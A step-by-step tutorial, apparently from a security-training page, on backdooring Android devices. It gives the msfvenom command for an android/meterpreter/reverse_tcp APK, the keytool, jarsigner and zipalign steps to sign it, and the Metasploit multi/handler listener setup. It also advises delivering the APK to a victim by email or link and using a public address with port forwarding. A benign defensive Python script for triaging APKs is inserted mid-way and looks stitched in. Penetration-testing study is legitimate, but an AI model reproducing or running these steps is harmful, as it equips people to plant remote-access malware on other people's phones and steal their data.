Hack an Android mobile device using MSFvenom and the Metasploit framework. Here, we will use MSFvenom to generate a payload, save it as an .apk file, and set up a listener in the Metasploit framework. Once the user/victim downloads and installs the malicious .apk, the attacker gets a session back in Metasploit. The attacker needs to do some social engineering to get the .apk installed on the victim's mobile device.
We will demonstrate this using the following tools:
- Kali Linux/ BackBox/ Parrot
- Android emulator
- VMware or Virtual Box (virtual environment)
NOTE: This lab is for educational purposes only; BacKDoor is not responsible for any illegal activity performed by the student.
Step 1: Starting Kali Linux / BackBox / Parrot
- From your VM, start Kali Linux and log in with root/toor (user ID/password).
- Open a terminal and build the payload for the Android emulator using the MSFvenom tool.
MSFvenom is a combination of msfpayload and msfencode. These tools are extremely useful for generating payloads in various formats and encoding them with various encoder modules. Merging the two tools into one just made sense: it standardizes the command-line options, speeds things up a bit by using a single framework instance, and handles all possible output formats. MSFvenom is used here to build the payload that compromises the Android device.
Using MSFvenom, we create the payload .apk file with the following command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 R > /root/Desktop/backdoor.apk
-p = payload to be used
LHOST = local host IP that receives the back (reverse) connection (check yours with the ifconfig command).
LPORT = local port on which the listener waits for the victim's connection (we set it to 4444).
R = raw output format (for this payload the raw output is an apk).
/root/Desktop/ (location) = where the file is saved
Note: In this command we used a local address because we are in a local environment. To do this over the public network, you have to enter your public address in LHOST and enable port forwarding on the router.
After the .apk file has been created successfully, we need to sign it, because Android devices do not allow installing apps without an appropriate signing certificate. Android devices only install signed .apk files.
We need to sign the apk file manually in Kali Linux using:
- Keytool (Preinstalled)
- jar signer (Preinstalled)
- zipalign (Need to Install)
To sign the apk file locally, use these commands (the same alias must be used in keytool and jarsigner):
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore APPNAME.apk alias_name
jarsigner -verify -verbose -certs APPNAME.apk
zipalign is not preinstalled in Kali Linux, so you have to install it first. Run it after signing, because it rewrites the archive:
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
Now we have signed our backdoor.apk file successfully and it can be installed on an Android device. After verification and zipalign, our new file name is shooter.apk.
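From the defender's side, an APK produced and signed as above can be triaged without installing it: an APK is a zip, so a script can check whether it carries a v1 (JAR) signature under META-INF/ and whether its classes.dex references the package the default msfvenom Android template uses. The script below is an added example, not code from this page or from Metasploit; the com/metasploit/stage marker is an assumption based on the default template, and the sample APK is constructed in memory so the script runs offline.

```python
import io
import zipfile

# Assumption: the default msfvenom Android template packages its classes
# under com.metasploit.stage, so the dex string pool contains this prefix.
DEX_MARKERS = (b"Lcom/metasploit/stage/", b"com/metasploit/stage")


def triage_apk(apk_bytes: bytes) -> dict:
    """Static triage of an APK given as raw bytes; returns simple findings."""
    findings = {"entries": 0, "v1_signed": False, "metasploit_stage": False}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        findings["entries"] = len(names)
        # A v1 signature leaves MANIFEST.MF plus a signature block (.RSA/.DSA/.EC).
        blocks = [n for n in names
                  if n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))]
        findings["v1_signed"] = bool(blocks) and "META-INF/MANIFEST.MF" in names
        # Scan every dex file for the well-known payload package string.
        for n in names:
            if n.endswith(".dex") and any(m in z.read(n) for m in DEX_MARKERS):
                findings["metasploit_stage"] = True
    return findings


def build_sample_apk(with_marker: bool, signed: bool) -> bytes:
    """Constructed test input: a tiny zip imitating an APK layout (not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00placeholder")
        cls = b"Lcom/metasploit/stage/Payload;" if with_marker else b"Lcom/example/app/Main;"
        z.writestr("classes.dex", b"dex\n035\x00" + cls)
        if signed:
            z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            z.writestr("META-INF/ALIAS_NA.SF", "Signature-Version: 1.0\n")
            z.writestr("META-INF/ALIAS_NA.RSA", b"\x30\x82placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for label, apk in (("suspicious", build_sample_apk(True, True)),
                       ("benign", build_sample_apk(False, True))):
        print(label, triage_apk(apk))
```

On a real file, pass the bytes of the .apk to triage_apk(); a hit on metasploit_stage together with a freshly self-signed v1 signature is a strong reason to block the install.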
Now we have to start the listener on the Kali Linux / BackBox / Parrot machine with the multi/handler module in Metasploit.
Launch exploit/multi/handler and select the Android payload so it listens for the clients.
In Terminal: use exploit/multi/handler
Now set the options for the payload, the listener IP (LHOST) and the listener port (LPORT). These must match what we used when creating the APK with MSFvenom: the local host IP, port 4444 and the payload android/meterpreter/reverse_tcp.
Then we run the exploit and start listening for the Android device. Once the app is installed on the device, the connection comes back to the listener.
In Terminal: exploit
Now we transfer the shooter.apk file to the victim's mobile device. In our environment, we use an Android emulator as the target device. To deliver shooter.apk to the victim, send an email link or share the download link to the mobile device.
LHOST - local host where you receive the session after the payload executes
RHOST - remote host or target host
LPORT - local port on which you want the session
RPORT - remote port or target port number
exploit (command) - runs the exploit
Payload - code that runs after successful exploitation
Exploit - malicious code that exploits a vulnerability